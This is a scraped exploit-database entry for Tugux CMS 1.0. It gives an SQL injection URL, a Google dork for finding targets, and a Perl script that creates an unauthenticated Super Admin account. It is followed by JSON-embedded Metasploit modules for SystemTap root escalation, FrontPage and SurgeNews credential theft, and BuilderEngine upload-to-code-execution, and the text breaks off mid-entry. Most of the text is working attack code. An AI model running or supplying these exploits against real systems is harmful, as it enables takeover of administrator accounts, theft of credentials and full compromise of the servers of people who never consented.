ID 1337DAY-ID-15639
Type zdt
Reporter Aodrulez
Modified 2011-03-18T00:00:00
Description
Exploit for php platform in category web applications
Vulnerable Web-App : Tugux CMS 1.0_final
Vulnerability : Multiple Vulnerabilities.
Author : Aodrulez. (Atul Alex Cherian)
Email : [email protected]
Google-Dork : "Copyright 2010-2011 Tugux CMS"
Tested on : Ubuntu 10.04
Web-App : http://sourceforge.net/projects/tuguxcms/
+---------+
| Details |
+---------+
1] SQLi
Exploit : http://localhost/latest.php?nid=9'[sqli]
2] "create_admin_parse.php"
Vulnerability : Can be used to add Super Admin Accounts without
any authentication. :)
+--------------------+
| Exploit (Perl Code)|
+--------------------+
(This Exploit will Add
a new Super Admin Account)
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
use LWP 5.64;
my $browser = LWP::UserAgent->new();
my $url=$ARGV[0];
print "+----------------------------------------+\n";
print "| Tugux CMS 1.0 Multiple Vulnerabilities |\n";
print "+----------------------------------------+\n\n";
print "Author : Aodrulez.\n";
print "Email : f3arm3d3ar\@gmail.com\n";
print "Google-Dork : \"Copyright 2010-2011 Tugux CMS\"\n";
if(!$url)
{die ("\nPlease enter the target url. Ex. perl $0 http://www.test.com");}
my $exploit='/administrator/create_admin_parse.php';
print "\n[+] Creating a new Super Admin \\m/";
$response = HTTP::Request->new(POST => $url.$exploit) or die("\n Connection Error!");
$response->content_type("application/x-www-form-urlencoded");
$response->content("username=Aodrulez&pass1=aod&type=a");
my $data=$browser->request($response)->as_string;
if($data!~m/HTTP\/1.1 200 OK/){ die ("\n$url Not Vulnerable!\n");}
print "\n[!] Admin Username : Aodrulez\n[!] Admin Password : aod\n[!] Type : Super Admin.\n";
+-------------------+
| Greetz Fly Out To |
+-------------------+
1] Amforked() : My Mentor.
2] The Blue Genius : My Boss.
3] str0ke (milw0rm)
4] www.orchidseven.com
5] www.malcon.org
6] www.isac.org.in
+-------+
| Quote |
+-------+
"FREEDOM! FOREVER!" - Aodrulez
# 0day.today [2018-03-06] #
{"published": "2011-03-18T00:00:00", "id": "1337DAY-ID-15639", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:44:53", "bulletin": {"published": "2011-03-18T00:00:00", "id": "1337DAY-ID-15639", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 5.5, "modified": "2016-04-20T01:44:53"}}, "hash": "c799141072eeebc2925c3f610bd321b590cf8eb5b8993083d6f0770fe4448d92", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:44:53", "edition": 1, "title": "Tugux CMS 1.0_final Multiple Vulnerabilities", "href": "http://0day.today/exploit/description/15639", "modified": "2011-03-18T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/15639", "references": [], "reporter": "Aodrulez", "sourceData": "Vulnerable Web-App : Tugux CMS 1.0_final\r\nVulnerability : Multiple Vulnerabilities.\r\nAuthor : Aodrulez. (Atul Alex Cherian)\r\nEmail : f3arm3d3ar@gmail.com\r\nGoogle-Dork : \"Copyright 2010-2011 Tugux CMS\"\r\nTested on : Ubuntu 10.04\r\nWeb-App : http://sourceforge.net/projects/tuguxcms/\r\n \r\n \r\n+---------+\r\n| Details |\r\n+---------+\r\n \r\n1] SQLi\r\nExploit : http://localhost/latest.php?nid=9'[sqli]\r\n \r\n2] \"create_admin_parse.php\"\r\nVulnerability : Can be used to add Super Admin Accounts without\r\n any authentication. :)\r\n \r\n \r\n \r\n+--------------------+\r\n| Exploit (Perl Code)|\r\n+--------------------+\r\n(This Exploit will Add\r\na new Super Admin Account)\r\n \r\nuse HTTP::Request::Common qw(POST);\r\nuse LWP::UserAgent;\r\nuse LWP 5.64;\r\nmy $browser = LWP::UserAgent->new();\r\nmy $url=$ARGV[0];\r\nprint \"+----------------------------------------+\\n\";\r\nprint \"| Tugux CMS 1.0 Multiple Vulnerabilities |\\n\";\r\nprint \"+----------------------------------------+\\n\\n\";\r\nprint \"Author : Aodrulez.\\n\";\r\nprint \"Email : f3arm3d3ar\\@gmail.com\\n\";\r\nprint \"Google-Dork : \\\"Copyright 2010-2011 Tugux CMS\\\"\\n\";\r\nif(!$url)\r\n{die (\"\\nPlease enter the target url. Ex. perl $0 http://www.test.com\");}\r\nmy $exploit='/administrator/create_admin_parse.php';\r\nprint \"\\n[+] Creating a new Super Admin \\\\m/\";\r\n$response = HTTP::Request->new(POST => $url.$exploit) or die(\"\\n Connection Error!\");\r\n$response->content_type(\"application/x-www-form-urlencoded\");\r\n$response->content(\"username=Aodrulez&pass1=aod&type=a\");\r\nmy $data=$browser->request($response)->as_string;\r\nif($data!~m/HTTP\\/1.1 200 OK/){ die (\"\\n$url Not Vulnerable!\\n\");}\r\nprint \"\\n[!] Admin Username : Aodrulez\\n[!] Admin Password : aod\\n[!] Type : Super Admin.\\n\";\r\n \r\n \r\n \r\n+-------------------+\r\n| Greetz Fly Out To |\r\n+-------------------+\r\n \r\n \r\n1] Amforked() : My Mentor.\r\n2] The Blue Genius : My Boss.\r\n3] str0ke (milw0rm)\r\n4] www.orchidseven.com\r\n5] www.malcon.org\r\n6] www.isac.org.in\r\n \r\n \r\n+-------+\r\n| Quote |\r\n+-------+\r\n \r\n\"FREEDOM! FOREVER!\" - Aodrulez\r\n\r\n\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "75a2434c597ba21f6431c60f2801e13b", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e7b6d53d3aa96407a41e8d351dd8ef82", "key": "modified"}, {"hash": "bb40332c9ffb4964f341260e6cfce29e", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "61f72ad1eb6fc1c4cfd83aca1d16d478", "key": "title"}, {"hash": "a11e41b613d1f24843ed8c7c26920d4f", "key": "sourceData"}, {"hash": "933d4b93974432a71a0472e58295476f", "key": "sourceHref"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "e7b6d53d3aa96407a41e8d351dd8ef82", "key": "published"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "e499ba7af3555f349fdd6206e97e6ada1b3c8a30af0862c9f57682eb65e774c8", "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2018-03-06T03:37:39"}, "dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:144764", "PACKETSTORM:129830", "PACKETSTORM:96259"]}, {"type": "zdt", "idList": ["1337DAY-ID-28866", "1337DAY-ID-25206", "1337DAY-ID-23084"]}, {"type": "exploitdb", "idList": ["EDB-ID:43045", "EDB-ID:35731", "EDB-ID:15639"]}, {"type": "seebug", "idList": ["SSV:70305"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/PANDORA_UPLOAD_EXEC", "MSF:EXPLOIT/UNIX/WEBAPP/MITEL_AWC_EXEC"]}, {"type": "cve", "idList": ["CVE-2010-4279"]}, {"type": "openvas", "idList": ["OPENVAS:100927", "OPENVAS:1361412562310100927"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25206", "SECURITYVULNS:VULN:11274", "SECURITYVULNS:DOC:15639"]}, {"type": "nessus", "idList": ["PANDORA_FMS_AUTH_BYPASS.NASL"]}], "modified": "2018-03-06T03:37:39"}, "vulnersScore": 7.0}, "type": "zdt", "lastseen": "2018-03-06T03:37:39", "edition": 2, "title": "Tugux CMS 1.0_final Multiple Vulnerabilities", "href": "https://0day.today/exploit/description/15639", "modified": "2011-03-18T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/15639", "references": [], "reporter": "Aodrulez", "sourceData": "Vulnerable Web-App : Tugux CMS 1.0_final\r\nVulnerability : Multiple Vulnerabilities.\r\nAuthor : Aodrulez. (Atul Alex Cherian)\r\nEmail : [email\u00a0protected]\r\nGoogle-Dork : \"Copyright 2010-2011 Tugux CMS\"\r\nTested on : Ubuntu 10.04\r\nWeb-App : http://sourceforge.net/projects/tuguxcms/\r\n \r\n \r\n+---------+\r\n| Details |\r\n+---------+\r\n \r\n1] SQLi\r\nExploit : http://localhost/latest.php?nid=9'[sqli]\r\n \r\n2] \"create_admin_parse.php\"\r\nVulnerability : Can be used to add Super Admin Accounts without\r\n any authentication. :)\r\n \r\n \r\n \r\n+--------------------+\r\n| Exploit (Perl Code)|\r\n+--------------------+\r\n(This Exploit will Add\r\na new Super Admin Account)\r\n \r\nuse HTTP::Request::Common qw(POST);\r\nuse LWP::UserAgent;\r\nuse LWP 5.64;\r\nmy $browser = LWP::UserAgent->new();\r\nmy $url=$ARGV[0];\r\nprint \"+----------------------------------------+\\n\";\r\nprint \"| Tugux CMS 1.0 Multiple Vulnerabilities |\\n\";\r\nprint \"+----------------------------------------+\\n\\n\";\r\nprint \"Author : Aodrulez.\\n\";\r\nprint \"Email : f3arm3d3ar\\@gmail.com\\n\";\r\nprint \"Google-Dork : \\\"Copyright 2010-2011 Tugux CMS\\\"\\n\";\r\nif(!$url)\r\n{die (\"\\nPlease enter the target url. Ex. perl $0 http://www.test.com\");}\r\nmy $exploit='/administrator/create_admin_parse.php';\r\nprint \"\\n[+] Creating a new Super Admin \\\\m/\";\r\n$response = HTTP::Request->new(POST => $url.$exploit) or die(\"\\n Connection Error!\");\r\n$response->content_type(\"application/x-www-form-urlencoded\");\r\n$response->content(\"username=Aodrulez&pass1=aod&type=a\");\r\nmy $data=$browser->request($response)->as_string;\r\nif($data!~m/HTTP\\/1.1 200 OK/){ die (\"\\n$url Not Vulnerable!\\n\");}\r\nprint \"\\n[!] Admin Username : Aodrulez\\n[!] Admin Password : aod\\n[!] Type : Super Admin.\\n\";\r\n \r\n \r\n \r\n+-------------------+\r\n| Greetz Fly Out To |\r\n+-------------------+\r\n \r\n \r\n1] Amforked() : My Mentor.\r\n2] The Blue Genius : My Boss.\r\n3] str0ke (milw0rm)\r\n4] www.orchidseven.com\r\n5] www.malcon.org\r\n6] www.isac.org.in\r\n \r\n \r\n+-------+\r\n| Quote |\r\n+-------+\r\n \r\n\"FREEDOM! FOREVER!\" - Aodrulez\r\n\r\n\n\n# 0day.today [2018-03-06] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "60239d7d0281b04a08d86e60904da422", "key": "href"}, {"hash": "e7b6d53d3aa96407a41e8d351dd8ef82", "key": "modified"}, {"hash": "e7b6d53d3aa96407a41e8d351dd8ef82", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "75a2434c597ba21f6431c60f2801e13b", "key": "reporter"}, {"hash": "174eced874d80321eb2148fcb2b0e143", "key": "sourceData"}, {"hash": "1997d900240103756e62e39b1ae9bc20", "key": "sourceHref"}, {"hash": "61f72ad1eb6fc1c4cfd83aca1d16d478", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"metasploit": [{"lastseen": "2019-12-06T23:28:31", "bulletinFamily": "exploit", "description": "This module attempts to gain root privileges by exploiting a vulnerability in the `staprun` executable included with SystemTap version 1.3. The `staprun` executable does not clear environment variables prior to executing `modprobe`, allowing an arbitrary configuration file to be specified in the `MODPROBE_OPTIONS` environment variable, resulting in arbitrary command execution with root privileges. This module has been tested successfully on: systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and systemtap 1.1-3.el5 on RHEL 5.5 (x64).\n", "modified": "2019-11-03T00:33:24", "published": "2019-04-18T17:15:22", "id": "MSF:EXPLOIT/LINUX/LOCAL/SYSTEMTAP_MODPROBE_OPTIONS_PRIV_ESC", "href": "", "type": "metasploit", "title": "SystemTap MODPROBE_OPTIONS Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SystemTap MODPROBE_OPTIONS Privilege Escalation',\n 'Description' => %q{\n This module attempts to gain root privileges by exploiting a\n vulnerability in the `staprun` executable included with SystemTap\n version 1.3.\n\n The `staprun` executable does not clear environment variables prior to\n executing `modprobe`, allowing an arbitrary configuration file to be\n specified in the `MODPROBE_OPTIONS` environment variable, resulting\n in arbitrary command execution with root privileges.\n\n This module has been tested successfully on:\n\n systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and\n systemtap 1.1-3.el5 on RHEL 5.5 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Tavis Ormandy', # Discovery and exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2010-11-17',\n 'References' =>\n [\n ['BID', '44914'],\n ['CVE', '2010-4170'],\n ['EDB', '15620'],\n ['URL', 'https://securitytracker.com/id?1024754'],\n ['URL', 'https://access.redhat.com/security/cve/cve-2010-4170'],\n ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=653604'],\n ['URL', 'https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html'],\n ['URL', 'https://bugs.launchpad.net/bugs/677226'],\n ['URL', 'https://www.debian.org/security/2011/dsa-2348']\n ],\n 'Platform' => ['linux'],\n 'Arch' =>\n [\n ARCH_X86,\n ARCH_X64,\n ARCH_ARMLE,\n ARCH_AARCH64,\n ARCH_PPC,\n ARCH_MIPSLE,\n ARCH_MIPSBE\n ],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('STAPRUN_PATH', [true, 'Path to staprun executable', '/usr/bin/staprun'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def staprun_path\n datastore['STAPRUN_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n # On some systems, staprun execution is restricted to stapusr group:\n # ---s--x---. 1 root stapusr 178488 Mar 28 2014 /usr/bin/staprun\n unless cmd_exec(\"test -x '#{staprun_path}' && echo true\").include? 'true'\n vprint_error \"#{staprun_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{staprun_path} is executable\"\n\n unless setuid? staprun_path\n vprint_error \"#{staprun_path} is not setuid\"\n return CheckCode::Safe\n end\n vprint_good \"#{staprun_path} is setuid\"\n\n CheckCode::Detected\n end\n\n def exploit\n unless check == CheckCode::Detected\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 10..15}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n config_path = \"#{base_dir}/#{payload_name}.conf\"\n upload config_path, \"install uprobes /bin/sh\"\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | MODPROBE_OPTIONS='-C #{config_path}' #{staprun_path} -u #{rand_text_alphanumeric 10..15}\"\n vprint_line res\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb"}, {"lastseen": "2019-12-09T09:09:16", "bulletinFamily": "exploit", "description": "This module downloads and parses the '_vti_pvt/service.pwd', '_vti_pvt/administrators.pwd', and '_vti_pvt/authors.pwd' files on a FrontPage server to find credentials.\n", "modified": "2018-09-21T16:44:10", "published": "2018-08-27T18:20:26", "id": "MSF:AUXILIARY/SCANNER/HTTP/FRONTPAGE_CREDENTIAL_DUMP", "href": "", "type": "metasploit", "title": "FrontPage .pwd File Credential Dump", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'FrontPage .pwd File Credential Dump',\n 'Description' => %q{\n This module downloads and parses the '_vti_pvt/service.pwd',\n '_vti_pvt/administrators.pwd', and '_vti_pvt/authors.pwd' files on a FrontPage\n server to find credentials.\n },\n 'References' =>\n [\n [ 'PACKETSTORM', '11556'],\n [ 'URL', 'https://insecure.org/sploits/Microsoft.frontpage.insecurities.html'],\n [ 'URL', 'http://sparty.secniche.org/' ]\n ],\n 'Author' =>\n [\n 'Aditya K Sood @adityaksood', # Sparty tool'\n 'Stephen Haywood @averagesecguy' # Metasploit module'\n ],\n 'License' => MSF_LICENSE,\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'The base path', '/'])\n ])\n end\n\n\n def get_pass_file(fname)\n uri = normalize_uri(target_uri.path, '_vti_pvt', fname)\n\n vprint_status(\"Requesting: #{uri}\")\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'GET',\n })\n\n unless res.code == 200\n vprint_status(\"File #{uri} not found.\")\n return nil\n end\n\n vprint_status(\"Found #{uri}.\")\n\n unless res.body.lines.first.chomp == '# -FrontPage-'\n vprint_status(\"File does not contain FrontPage credentials.\")\n vprint_status(res.body)\n return nil\n end\n\n vprint_status(\"Found FrontPage credentials.\")\n return res.body\n end\n\n def run_host(ip)\n files = ['service.pwd', 'administrators.pwd', 'authors.pwd']\n creds = []\n\n files.each do |filename|\n source = filename.chomp('.pwd').capitalize\n contents = get_pass_file(filename)\n\n next if contents.nil?\n\n print_good(\"#{ip} - #{filename}\")\n\n contents.each_line do |line|\n next if line.chomp == '# -FrontPage-'\n user = line.chomp.split(':')[0]\n pass = line.chomp.split(':')[1]\n\n creds << [source, user, pass]\n end\n end\n\n cred_table = Rex::Text::Table.new(\n 'Header' => 'FrontPage Credentials',\n 'Indent' => 1,\n 'Columns' => ['Source', 'Username', 'Password Hash']\n )\n\n creds.each do |c|\n cred_table << c\n end\n\n print_line\n print_line(\"#{cred_table}\")\n\n loot_name = 'frontpage.creds'\n loot_type = 'text/csv'\n loot_filename = 'frontpage_creds.csv'\n loot_desc = 'FrontPage Credentials'\n\n p = store_loot(\n loot_name,\n loot_type,\n rhost,\n cred_table.to_csv,\n loot_filename,\n loot_desc)\n\n print_status \"Credentials saved in: #{p}\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/frontpage_credential_dump.rb"}, {"lastseen": "2019-11-22T20:27:31", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in the WebNews web interface of SurgeNews on TCP ports 9080 and 8119 which allows unauthenticated users to download arbitrary files from the software root directory; including the user database, configuration files and log files. This module extracts the administrator username and password, and the usernames and passwords or password hashes for all users. This module has been tested successfully on SurgeNews version 2.0a-13 on Windows 7 SP 1 and 2.0a-12 on Ubuntu Linux.\n", "modified": "2019-03-05T09:38:51", "published": "2017-06-17T01:49:47", "id": "MSF:AUXILIARY/SCANNER/HTTP/SURGENEWS_USER_CREDS", "href": "", "type": "metasploit", "title": "SurgeNews User Credentials", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n\n HttpFingerprint = { :pattern => [ /DManager/ ] }\n\n def initialize(info = {})\n super(update_info(\n info,\n 'Name' => 'SurgeNews User Credentials',\n 'Description' => %q{\n This module exploits a vulnerability in the WebNews web interface\n of SurgeNews on TCP ports 9080 and 8119 which allows unauthenticated\n users to download arbitrary files from the software root directory;\n including the user database, configuration files and log files.\n\n This module extracts the administrator username and password, and\n the usernames and passwords or password hashes for all users.\n\n This module has been tested successfully on SurgeNews version\n 2.0a-13 on Windows 7 SP 1 and 2.0a-12 on Ubuntu Linux.\n },\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'http://news.netwinsite.com:8119/webnews?cmd=body&item=34896&group=netwin.surgemail'],\n ],\n 'Author' => 'bcoles',\n 'DisclosureDate' => 'Jun 16 2017'))\n\n register_options [ Opt::RPORT(9080) ]\n end\n\n def max_retries\n 3\n end\n\n def check_host(ip)\n @tries = 0\n res = read_file 'install.log'\n if res =~ /SurgeNews/\n return Exploit::CheckCode::Vulnerable\n end\n Exploit::CheckCode::Safe\n end\n\n def read_file(file)\n data = nil\n @tries += 1\n vprint_status \"Retrieving file: #{file}\"\n res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'webnews'),\n 'vars_get' => { 'cmd' => 'part', 'fname' => file }\n if !res\n vprint_error 'Connection failed'\n elsif res.code == 550\n vprint_error \"Could not find file '#{file}'\"\n elsif res.code == 200 && res.body =~ /550 Key: No key activated/\n # unregistered software throws an error once in every ~20 requests\n # try again...\n if @tries >= max_retries\n vprint_error \"Failed to retrieve file '#{file}' after max retries (#{max_retries})\"\n else\n vprint_status 'Retrying...'\n return read_file file\n end\n elsif res.code == 200 && !res.body.empty?\n vprint_good \"Found #{file} (#{res.body.length} bytes)\"\n data = res.body\n else\n vprint_error 'Unexpected reply'\n end\n @tries = 0\n data\n end\n\n def parse_log(log_data)\n return if log_data.nil?\n username = log_data.scan(/value_set\\(manager\\)\\((.*)\\)/).flatten.reject { |c| c.to_s.empty? }.last\n password = log_data.scan(/value_set\\(password\\)\\((.*)\\)/).flatten.reject { |c| c.to_s.empty? }.last\n { 'username' => username, 'password' => password }\n end\n\n def parse_user_db(user_data)\n return if user_data.nil?\n creds = []\n user_data.lines.each do |line|\n next if line.eql? ''\n if line =~ /^(.+?):(.*):Groups=/\n user = $1\n pass = $2\n # clear text credentials are prefaced with '*'\n if pass.starts_with? '*'\n creds << { 'username' => user, 'password' => pass[1..-1] }\n # otherwise its a hash\n else\n creds << { 'username' => user, 'hash' => pass }\n end\n end\n end\n creds\n end\n\n def run_host(ip)\n @tries = 0\n\n service_data = { address: rhost,\n port: rport,\n service_name: (ssl ? 'https' : 'http'),\n protocol: 'tcp',\n workspace_id: myworkspace_id }\n\n cred_table = Rex::Text::Table.new 'Header' => 'SurgeNews User Credentials',\n 'Indent' => 1,\n 'Columns' => ['Username', 'Password', 'Password Hash', 'Admin']\n\n # Read administrator password from password.log\n admin = parse_log read_file 'password.log'\n # If password.log doesn't contain credentials\n # then the password hasn't been updated since install.\n # Retrieve the credentials from install.log instead.\n admin = parse_log read_file 'install.log' if admin.nil?\n\n if admin.nil?\n vprint_error 'Found no administrator credentials'\n else\n print_good \"Found administrator credentials (#{admin['username']}:#{admin['password']})\"\n cred_table << [admin['username'], admin['password'], nil, true]\n\n credential_data = { origin_type: :service,\n module_fullname: fullname,\n private_type: :password,\n private_data: admin['password'],\n username: admin['username'] }\n\n credential_data.merge! service_data\n credential_core = create_credential credential_data\n login_data = { core: credential_core,\n access_level: 'Administrator',\n status: Metasploit::Model::Login::Status::UNTRIED }\n login_data.merge! service_data\n create_credential_login login_data\n end\n\n # Read user credentials from nwauth.add\n users = parse_user_db read_file 'nwauth.add'\n if users.nil?\n vprint_error 'Found no user credentials in nwauth.add'\n else\n vprint_status \"Found #{users.length} users in nwauth.add\"\n end\n\n users.each do |user|\n next if user.empty?\n\n cred_table << [user['username'], user['password'], user['hash'], false]\n\n if user['password']\n print_good \"Found user credentials (#{user['username']}:#{user['password']})\"\n credential_data = { origin_type: :service,\n module_fullname: fullname,\n private_type: :password,\n private_data: user['password'],\n username: user['username'] }\n else\n credential_data = { origin_type: :service,\n module_fullname: fullname,\n private_type: :nonreplayable_hash,\n private_data: user['hash'],\n username: user['username'] }\n end\n\n credential_data.merge! service_data\n credential_core = create_credential credential_data\n login_data = { core: credential_core,\n access_level: 'User',\n status: Metasploit::Model::Login::Status::UNTRIED }\n login_data.merge! service_data\n create_credential_login login_data\n end unless users.nil?\n\n print_line\n print_line cred_table.to_s\n\n p = store_loot 'surgenews.user.creds', 'text/csv', rhost, cred_table.to_csv, 'SurgeNews User Credentials'\n print_good \"Credentials saved in: #{p}\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/surgenews_user_creds.rb"}, {"lastseen": "2019-11-29T20:45:30", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability found in BuilderEngine 3.5.0 via elFinder 2.0. The jquery-file-upload plugin can be abused to upload a malicious file, which would result in arbitrary remote code execution under the context of the web server.\n", "modified": "2017-07-24T13:26:21", "published": "2017-05-12T16:37:08", "id": "MSF:EXPLOIT/MULTI/HTTP/BUILDERENGINE_UPLOAD_EXEC", "href": "", "type": "metasploit", "title": "BuilderEngine Arbitrary File Upload Vulnerability and execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"BuilderEngine Arbitrary File Upload Vulnerability and execution\",\n 'Description' => %q{\n This module exploits a vulnerability found in BuilderEngine 3.5.0\n via elFinder 2.0. The jquery-file-upload plugin can be abused to upload a malicious\n file, which would result in arbitrary remote code execution under the context of\n the web server.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'metanubix', # PoC\n 'Marco Rivoli' # Metasploit\n ],\n 'References' =>\n [\n ['EDB', '40390']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['BuilderEngine 3.5.0', {}]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Sep 18 2016\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to BuilderEngine', '/'])\n ])\n end\n\n def check\n uri = target_uri.path\n uri << '/' if uri[-1,1] != '/'\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(uri, 'themes/dashboard/assets/plugins/jquery-file-upload/server/php/')\n })\n\n if res && res.code == 200 && !res.body.blank?\n return Exploit::CheckCode::Appears\n else\n return Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n uri = target_uri.path\n\n peer = \"#{rhost}:#{rport}\"\n php_pagename = rand_text_alpha(8 + rand(8)) + '.php'\n data = Rex::MIME::Message.new\n payload_encoded = Rex::Text.rand_text_alpha(1)\n payload_encoded << \"<?php \"\n payload_encoded << payload.encoded\n payload_encoded << \" ?>\\r\\n\"\n data.add_part(payload_encoded, 'application/octet-stream', nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{php_pagename}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'uri' => normalize_uri(uri,'themes/dashboard/assets/plugins/jquery-file-upload/server/php/'),\n 'method' => 'POST',\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if res\n if res.code == 200 && res.body =~ /files|#{php_pagename}/\n print_good(\"Our payload is at: #{php_pagename}. Calling payload...\")\n register_file_for_cleanup(php_pagename)\n else\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unable to deploy payload, server returned #{res.code}\")\n end\n else\n fail_with(Failure::Unknown, 'ERROR')\n end\n\n print_status(\"Calling payload...\")\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(uri,'files/', php_pagename)\n )\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/builderengine_upload_exec.rb"}, {"lastseen": "2019-11-22T08:29:59", "bulletinFamily": "exploit", "description": "This module exploits an unauthenticated remote command execution vulnerability in the console component of Serviio Media Server versions 1.4 to 1.8 on Windows operating systems. The console service (on port 23423 by default) exposes a REST API which which does not require authentication. The 'action' API endpoint does not sufficiently sanitize user-supplied data in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is used 